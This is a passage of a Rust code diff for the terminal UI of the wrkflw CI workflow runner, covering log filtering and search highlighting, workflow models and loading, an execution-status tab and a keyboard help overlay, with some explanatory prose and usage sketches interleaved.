                    last_processed_time = Instant::now();
                }
            }
        }
    }

    /// Get combined app and system logs
    fn get_combined_logs(app_logs: &[String]) -> Vec<String> {
        let mut all_logs = Vec::new();

        // Add app logs
        for log in app_logs {
            all_logs.push(log.clone());
        }

        // Add system logs
        for log in wrkflw_logging::get_logs() {
            all_logs.push(log.clone());
        }

        all_logs
    }

    /// Process logs according to search and filter criteria
    fn process_logs(all_logs: &[String], request: &LogProcessingRequest) -> LogProcessingResponse {
        // Filter logs based on search query and filter level
        let mut filtered_logs = Vec::new();
        let mut search_matches = Vec::new();

        for (idx, log) in all_logs.iter().enumerate() {
            let passes_filter = match &request.filter_level {
                None => true,
                Some(level) => level.matches(log),
            };

            let matches_search = if request.search_query.is_empty() {
                true
            } else {
                log.to_lowercase()
                    .contains(&request.search_query.to_lowercase())
            };

            if passes_filter && matches_search {
                filtered_logs.push((idx, log));
                if matches_search && !request.search_query.is_empty() {
                    search_matches.push(filtered_logs.len() - 1);
                }
            }
        }

        // Process filtered logs into display format
        let processed_logs: Vec<ProcessedLogEntry> = filtered_logs
            .iter()
            .map(|(_, log_line)| Self::process_log_entry(log_line, &request.search_query))
            .collect();

        LogProcessingResponse {
            processed_logs,
            total_log_count: all_logs.len(),
            filtered_count: filtered_logs.len(),
            search_matches,
        }
    }

    /// Process a single log entry into display format
    fn process_log_entry(log_line: &str, search_query: &str) -> ProcessedLogEntry {
        // Extract timestamp from log format [HH:MM:SS]
        let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
            let end = log_line.find(']').unwrap_or(0);
            if end > 1 {
                log_line[1..end].to_string()
            } else {
                "??:??:??".to_string()
            }
        } else {
            "??:??:??".to_string()
        };

        // Determine log type and style
        let (log_type, log_style) =
            if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
            {
                ("ERROR", Style::default().fg(Color::Red))
            } else if log_line.contains("Warning")
                || log_line.contains("warning")
                || log_line.contains("⚠️")
            {
                ("WARN", Style::default().fg(Color::Yellow))
            } else if log_line.contains("Success")
                || log_line.contains("success")
                || log_line.contains("✅")
            {
                ("SUCCESS", Style::default().fg(Color::Green))
            } else if log_line.contains("Running")
                || log_line.contains("running")
                || log_line.contains("⟳")
            {
                ("INFO", Style::default().fg(Color::Cyan))
            } else if log_line.contains("Triggering") || log_line.contains("triggered") {
                ("TRIG", Style::default().fg(Color::Magenta))
            } else {
                ("INFO", Style::default().fg(Color::Gray))
            };

        // Extract content after timestamp
        let content = if log_line.starts_with('[') && log_line.contains(']') {
            let start = log_line.find(']').unwrap_or(0) + 1;
            log_line[start..].trim()
        } else {
            log_line
        };

        // Create content spans with search highlighting
        let content_spans = if !search_query.is_empty() {
            Self::highlight_search_matches(content, search_query)
        } else {
            vec![Span::raw(content.to_string())]
        };

        ProcessedLogEntry {
            timestamp,
            log_type: log_type.to_string(),
            log_style,
            content_spans,
        }
    }

    /// Highlight search matches in content
    fn highlight_search_matches(content: &str, search_query: &str) -> Vec<Span<'static>> {
        let mut spans = Vec::new();
        let lowercase_content = content.to_lowercase();
        let lowercase_query = search_query.to_lowercase();

        if lowercase_content.contains(&lowercase_query) {
            let mut last_idx = 0;
            while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
                let real_idx = last_idx + idx;

                // Add text before match
                if real_idx > last_idx {
                    spans.push(Span::raw(content[last_idx..real_idx].to_string()));
                }

                // Add matched text with highlight
                let match_end = real_idx + search_query.len();
                spans.push(Span::styled(
                    content[real_idx..match_end].to_string(),
                    Style::default().bg(Color::Yellow).fg(Color::Black),
                ));

                last_idx = match_end;
            }

            // Add remaining text after last match
            if last_idx < content.len() {
                spans.push(Span::raw(content[last_idx..].to_string()));
            }
        } else {
            spans.push(Span::raw(content.to_string()));
        }

        spans
    }
}

impl Default for LogProcessor {
    fn default() -> Self {
        Self::new()
    }
}
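LogProcessor is meant to be polled from the render loop rather than awaited: the UI sends a LogProcessingRequest whenever its inputs change and drains try_get_update() once per frame, while the worker debounces reprocessing to at most once per 50 ms. A minimal sketch of that request/poll cycle, using only the API defined above (the surrounding render loop is assumed and is not part of this commit):

```rust
// Sketch of the intended request/poll pattern; not code from this commit.
let processor = LogProcessor::new();

// On each UI tick, describe the current view of the logs.
let _ = processor.request_update(LogProcessingRequest {
    search_query: "error".to_string(),
    filter_level: None, // no level filter; see LogFilterLevel in models
    app_logs: vec!["[12:00:01] ❌ Error processing workflow".to_string()],
    app_logs_count: 1,
    system_logs_count: 0,
});

// Later in the same tick (or a following one), pick up whatever is ready.
if let Some(update) = processor.try_get_update() {
    // Each ProcessedLogEntry is ready to render as a table row.
    let rows: Vec<_> = update.processed_logs.iter().map(|e| e.to_row()).collect();
    let _ = (rows, update.filtered_count, update.search_matches);
}
```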
100 crates/ui/src/models/mod.rs (Normal file)
@@ -0,0 +1,100 @@
// UI Models for wrkflw
use chrono::Local;
use std::path::PathBuf;
use wrkflw_executor::{JobStatus, StepStatus};

/// Type alias for the complex execution result type
pub type ExecutionResultMsg = (usize, Result<(Vec<wrkflw_executor::JobResult>, ()), String>);

/// Represents an individual workflow file
pub struct Workflow {
    pub name: String,
    pub path: PathBuf,
    pub selected: bool,
    pub status: WorkflowStatus,
    pub execution_details: Option<WorkflowExecution>,
}

/// Status of a workflow
#[derive(Debug, Clone, PartialEq)]
pub enum WorkflowStatus {
    NotStarted,
    Running,
    Success,
    Failed,
    Skipped,
}

/// Detailed execution information
pub struct WorkflowExecution {
    pub jobs: Vec<JobExecution>,
    pub start_time: chrono::DateTime<Local>,
    pub end_time: Option<chrono::DateTime<Local>>,
    pub logs: Vec<String>,
    pub progress: f64, // 0.0 - 1.0 for progress bar
}

/// Job execution details
pub struct JobExecution {
    pub name: String,
    pub status: JobStatus,
    pub steps: Vec<StepExecution>,
    pub logs: Vec<String>,
}

/// Step execution details
pub struct StepExecution {
    pub name: String,
    pub status: StepStatus,
    pub output: String,
}

/// Log filter levels
#[derive(Debug, Clone, PartialEq)]
pub enum LogFilterLevel {
    Info,
    Warning,
    Error,
    Success,
    Trigger,
    All,
}

impl LogFilterLevel {
    pub fn matches(&self, log: &str) -> bool {
        match self {
            LogFilterLevel::Info => {
                log.contains("ℹ️") || (log.contains("INFO") && !log.contains("SUCCESS"))
            }
            LogFilterLevel::Warning => log.contains("⚠️") || log.contains("WARN"),
            LogFilterLevel::Error => log.contains("❌") || log.contains("ERROR"),
            LogFilterLevel::Success => log.contains("SUCCESS") || log.contains("success"),
            LogFilterLevel::Trigger => {
                log.contains("Triggering") || log.contains("triggered") || log.contains("TRIG")
            }
            LogFilterLevel::All => true,
        }
    }

    pub fn next(&self) -> Self {
        match self {
            LogFilterLevel::All => LogFilterLevel::Info,
            LogFilterLevel::Info => LogFilterLevel::Warning,
            LogFilterLevel::Warning => LogFilterLevel::Error,
            LogFilterLevel::Error => LogFilterLevel::Success,
            LogFilterLevel::Success => LogFilterLevel::Trigger,
            LogFilterLevel::Trigger => LogFilterLevel::All,
        }
    }

    pub fn to_string(&self) -> &str {
        match self {
            LogFilterLevel::All => "ALL",
            LogFilterLevel::Info => "INFO",
            LogFilterLevel::Warning => "WARNING",
            LogFilterLevel::Error => "ERROR",
            LogFilterLevel::Success => "SUCCESS",
            LogFilterLevel::Trigger => "TRIGGER",
        }
    }
}
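LogFilterLevel serves both as the per-line predicate (matches) and as the state that the filter toggle presumably steps through with next(), cycling All, Info, Warning, Error, Success, Trigger and back to All. A small self-contained illustration of the two methods together (test code added here purely for explanation; it is not part of this commit):

```rust
#[cfg(test)]
mod log_filter_illustration {
    use super::LogFilterLevel;

    #[test]
    fn cycling_from_all_reaches_info_and_filters_lines() {
        // All -> Info, following the cycle implemented in next().
        let level = LogFilterLevel::All.next();
        assert_eq!(level, LogFilterLevel::Info);

        // Info matches plain INFO lines but not error lines.
        assert!(level.matches("[12:00:01] INFO starting run"));
        assert!(!level.matches("[12:00:02] ❌ step failed"));
    }
}
```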
53 crates/ui/src/utils/mod.rs (Normal file)
@@ -0,0 +1,53 @@
// UI utilities
use crate::models::{Workflow, WorkflowStatus};
use std::path::{Path, PathBuf};
use wrkflw_utils::is_workflow_file;

/// Find and load all workflow files in a directory
pub fn load_workflows(dir_path: &Path) -> Vec<Workflow> {
    let mut workflows = Vec::new();

    // Default path is .github/workflows
    let default_workflows_dir = Path::new(".github").join("workflows");
    let is_default_dir = dir_path == default_workflows_dir || dir_path.ends_with("workflows");

    if let Ok(entries) = std::fs::read_dir(dir_path) {
        for entry in entries.flatten() {
            let path = entry.path();
            if path.is_file() && (is_workflow_file(&path) || !is_default_dir) {
                // Get just the base name without extension
                let name = path.file_stem().map_or_else(
                    || "[unknown]".to_string(),
                    |fname| fname.to_string_lossy().into_owned(),
                );

                workflows.push(Workflow {
                    name,
                    path,
                    selected: false,
                    status: WorkflowStatus::NotStarted,
                    execution_details: None,
                });
            }
        }
    }

    // Check for GitLab CI pipeline file in the root directory if we're in the default GitHub workflows dir
    if is_default_dir {
        // Look for .gitlab-ci.yml in the repository root
        let gitlab_ci_path = PathBuf::from(".gitlab-ci.yml");
        if gitlab_ci_path.exists() && gitlab_ci_path.is_file() {
            workflows.push(Workflow {
                name: "gitlab-ci".to_string(),
                path: gitlab_ci_path,
                selected: false,
                status: WorkflowStatus::NotStarted,
                execution_details: None,
            });
        }
    }

    // Sort workflows by name
    workflows.sort_by(|a, b| a.name.cmp(&b.name));
    workflows
}
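Note that load_workflows never fails: an unreadable directory simply yields an empty list. Inside the default `.github/workflows` directory only recognized workflow files are kept (plus a root `.gitlab-ci.yml` if present), while any other directory lists every file. A short sketch of a call site inside the crate (the helper function and the printing are illustrative, not part of this commit):

```rust
// Illustrative call site for load_workflows; not code from this commit.
use crate::utils::load_workflows;
use std::path::Path;

fn list_default_workflows() {
    for wf in load_workflows(Path::new(".github/workflows")) {
        println!("{} -> {}", wf.name, wf.path.display());
    }
}
```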
361 crates/ui/src/views/execution_tab.rs (Normal file)
@@ -0,0 +1,361 @@
|
||||
// Execution tab rendering
|
||||
use crate::app::App;
|
||||
use crate::models::WorkflowStatus;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Gauge, List, ListItem, Paragraph},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the execution tab
|
||||
pub fn render_execution_tab(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
area: Rect,
|
||||
) {
|
||||
// Get the workflow index either from current_execution or selected workflow
|
||||
let current_workflow_idx = app
|
||||
.current_execution
|
||||
.or_else(|| app.workflow_list_state.selected())
|
||||
.filter(|&idx| idx < app.workflows.len());
|
||||
|
||||
if let Some(idx) = current_workflow_idx {
|
||||
let workflow = &app.workflows[idx];
|
||||
|
||||
// Split the area into sections
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(5), // Workflow info with progress bar
|
||||
Constraint::Min(5), // Jobs list or Remote execution info
|
||||
Constraint::Length(7), // Execution info
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Workflow info section
|
||||
let status_text = match workflow.status {
|
||||
WorkflowStatus::NotStarted => "Not Started",
|
||||
WorkflowStatus::Running => "Running",
|
||||
WorkflowStatus::Success => "Success",
|
||||
WorkflowStatus::Failed => "Failed",
|
||||
WorkflowStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match workflow.status {
|
||||
WorkflowStatus::NotStarted => Style::default().fg(Color::Gray),
|
||||
WorkflowStatus::Running => Style::default().fg(Color::Cyan),
|
||||
WorkflowStatus::Success => Style::default().fg(Color::Green),
|
||||
WorkflowStatus::Failed => Style::default().fg(Color::Red),
|
||||
WorkflowStatus::Skipped => Style::default().fg(Color::Yellow),
|
||||
};
|
||||
|
||||
let mut workflow_info = vec![
|
||||
Line::from(vec![
|
||||
Span::styled("Workflow: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
workflow.name.clone(),
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled("Status: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(status_text, status_style),
|
||||
]),
|
||||
];
|
||||
|
||||
// Add progress bar for running workflows or workflows with execution details
|
||||
if let Some(execution) = &workflow.execution_details {
|
||||
// Calculate progress
|
||||
let progress = execution.progress;
|
||||
|
||||
// Add progress bar
|
||||
let gauge_color = match workflow.status {
|
||||
WorkflowStatus::Running => Color::Cyan,
|
||||
WorkflowStatus::Success => Color::Green,
|
||||
WorkflowStatus::Failed => Color::Red,
|
||||
_ => Color::Gray,
|
||||
};
|
||||
|
||||
let progress_text = match workflow.status {
|
||||
WorkflowStatus::Running => format!("{:.0}%", progress * 100.0),
|
||||
WorkflowStatus::Success => "Completed".to_string(),
|
||||
WorkflowStatus::Failed => "Failed".to_string(),
|
||||
_ => "Not started".to_string(),
|
||||
};
|
||||
|
||||
// Add empty line before progress bar
|
||||
workflow_info.push(Line::from(""));
|
||||
|
||||
// Add the gauge widget to the paragraph data
|
||||
workflow_info.push(Line::from(vec![Span::styled(
|
||||
format!("Progress: {}", progress_text),
|
||||
Style::default().fg(Color::Blue),
|
||||
)]));
|
||||
|
||||
let gauge = Gauge::default()
|
||||
.block(Block::default())
|
||||
.gauge_style(Style::default().fg(gauge_color).bg(Color::Black))
|
||||
.percent((progress * 100.0) as u16);
|
||||
|
||||
// Render gauge separately after the paragraph
|
||||
let workflow_info_widget = Paragraph::new(workflow_info).block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Workflow Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
let gauge_area = Rect {
|
||||
x: chunks[0].x + 2,
|
||||
y: chunks[0].y + 4,
|
||||
width: chunks[0].width - 4,
|
||||
height: 1,
|
||||
};
|
||||
|
||||
f.render_widget(workflow_info_widget, chunks[0]);
|
||||
f.render_widget(gauge, gauge_area);
|
||||
|
||||
// Jobs list section
|
||||
if execution.jobs.is_empty() {
|
||||
let placeholder = Paragraph::new("No jobs have started execution yet...")
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Jobs ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
f.render_widget(placeholder, chunks[1]);
|
||||
} else {
|
||||
let job_items: Vec<ListItem> = execution
|
||||
.jobs
|
||||
.iter()
|
||||
.map(|job| {
|
||||
let status_symbol = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => "✅",
|
||||
wrkflw_executor::JobStatus::Failure => "❌",
|
||||
wrkflw_executor::JobStatus::Skipped => "⏭",
|
||||
};
|
||||
|
||||
let status_style = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Gray),
|
||||
};
|
||||
|
||||
// Count completed and total steps
|
||||
let total_steps = job.steps.len();
|
||||
let completed_steps = job
|
||||
.steps
|
||||
.iter()
|
||||
.filter(|s| {
|
||||
s.status == wrkflw_executor::StepStatus::Success
|
||||
|| s.status == wrkflw_executor::StepStatus::Failure
|
||||
})
|
||||
.count();
|
||||
|
||||
let steps_info = format!("[{}/{}]", completed_steps, total_steps);
|
||||
|
||||
ListItem::new(Line::from(vec![
|
||||
Span::styled(status_symbol, status_style),
|
||||
Span::raw(" "),
|
||||
Span::styled(&job.name, Style::default().fg(Color::White)),
|
||||
Span::raw(" "),
|
||||
Span::styled(steps_info, Style::default().fg(Color::DarkGray)),
|
||||
]))
|
||||
})
|
||||
.collect();
|
||||
|
||||
let jobs_list = List::new(job_items)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Jobs ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.highlight_style(
|
||||
Style::default()
|
||||
.bg(Color::DarkGray)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)
|
||||
.highlight_symbol("» ");
|
||||
|
||||
f.render_stateful_widget(jobs_list, chunks[1], &mut app.job_list_state);
|
||||
}
|
||||
|
||||
// Execution info section
|
||||
let mut execution_info = Vec::new();
|
||||
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Started: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
execution.start_time.format("%Y-%m-%d %H:%M:%S").to_string(),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
|
||||
if let Some(end_time) = execution.end_time {
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Finished: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
end_time.format("%Y-%m-%d %H:%M:%S").to_string(),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
|
||||
// Calculate duration
|
||||
let duration = end_time.signed_duration_since(execution.start_time);
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Duration: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
format!(
|
||||
"{}m {}s",
|
||||
duration.num_minutes(),
|
||||
duration.num_seconds() % 60
|
||||
),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
} else {
|
||||
// Show running time for active workflows
|
||||
let current_time = chrono::Local::now();
|
||||
let running_time = current_time.signed_duration_since(execution.start_time);
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Running for: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
format!(
|
||||
"{}m {}s",
|
||||
running_time.num_minutes(),
|
||||
running_time.num_seconds() % 60
|
||||
),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]));
|
||||
}
|
||||
|
||||
// Add hint for Enter key to see details
|
||||
execution_info.push(Line::from(""));
|
||||
execution_info.push(Line::from(vec![
|
||||
Span::styled("Press ", Style::default().fg(Color::DarkGray)),
|
||||
Span::styled("Enter", Style::default().fg(Color::Yellow)),
|
||||
Span::styled(" to view job details", Style::default().fg(Color::DarkGray)),
|
||||
]));
|
||||
|
||||
let info_widget = Paragraph::new(execution_info).block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Execution Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
f.render_widget(info_widget, chunks[2]);
|
||||
} else {
|
||||
// No workflow execution to display
|
||||
let workflow_info_widget = Paragraph::new(workflow_info).block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Workflow Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
f.render_widget(workflow_info_widget, chunks[0]);
|
||||
|
||||
// No execution details to display
|
||||
let placeholder = Paragraph::new(vec![
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"No execution data available.",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(""),
|
||||
Line::from("Press 'Enter' to run this workflow."),
|
||||
Line::from(""),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Jobs ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(placeholder, chunks[1]);
|
||||
|
||||
// Execution information
|
||||
let info_widget = Paragraph::new(vec![
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"No execution has been started.",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)]),
|
||||
Line::from(""),
|
||||
Line::from("Press 'Enter' in the Workflows tab to run,"),
|
||||
Line::from("or 't' to trigger on GitHub."),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Execution Information ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(info_widget, chunks[2]);
|
||||
}
|
||||
} else {
|
||||
// No workflow execution to display
|
||||
let placeholder = Paragraph::new(vec![
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"No workflow execution data available.",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(""),
|
||||
Line::from("Select workflows in the Workflows tab and press 'r' to run them."),
|
||||
Line::from(""),
|
||||
Line::from("Or press Enter on a selected workflow to run it directly."),
|
||||
Line::from(""),
|
||||
Line::from("You can also press 't' to trigger a workflow on GitHub remotely."),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Execution ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(placeholder, area);
|
||||
}
|
||||
}
|
||||
458 crates/ui/src/views/help_overlay.rs (Normal file)
@@ -0,0 +1,458 @@
|
||||
// Help overlay rendering
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Paragraph, Wrap},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the help tab with scroll support
|
||||
pub fn render_help_content(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
area: Rect,
|
||||
scroll_offset: usize,
|
||||
) {
|
||||
// Split the area into columns for better organization
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Horizontal)
|
||||
.constraints([Constraint::Percentage(50), Constraint::Percentage(50)].as_ref())
|
||||
.split(area);
|
||||
|
||||
// Left column content
|
||||
let left_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"🗂 NAVIGATION",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Tab / Shift+Tab",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Switch between tabs"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1-4 / w,x,l,h",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Jump to specific tab"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓ or k/j",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Navigate lists"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Enter",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select/View details"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Esc",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Back/Exit help"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🚀 WORKFLOW MANAGEMENT",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Space",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle workflow selection"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"r",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Run selected workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"a",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Select all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Deselect all workflows"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"Shift+R",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Reset workflow status"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"t",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Trigger remote workflow"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🔧 EXECUTION MODES",
|
||||
Style::default()
|
||||
.fg(Color::Magenta)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"e",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle emulation mode"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"v",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle validation mode"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(vec![Span::styled(
|
||||
"Runtime Modes:",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Docker", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Container isolation (default)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Podman", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" - Rootless containers"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Emulation", Style::default().fg(Color::Red)),
|
||||
Span::raw(" - Process mode (UNSAFE)"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::raw(" • "),
|
||||
Span::styled("Secure Emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" - Sandboxed processes"),
|
||||
]),
|
||||
];
|
||||
|
||||
// Right column content
|
||||
let right_help_text = vec![
|
||||
Line::from(Span::styled(
|
||||
"📄 LOGS & SEARCH",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"s",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log search"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"f",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle log filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"c",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Clear search & filter"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"n",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Next search match"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"↑/↓",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Scroll logs/Navigate"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"ℹ️ TAB OVERVIEW",
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"1. Workflows",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
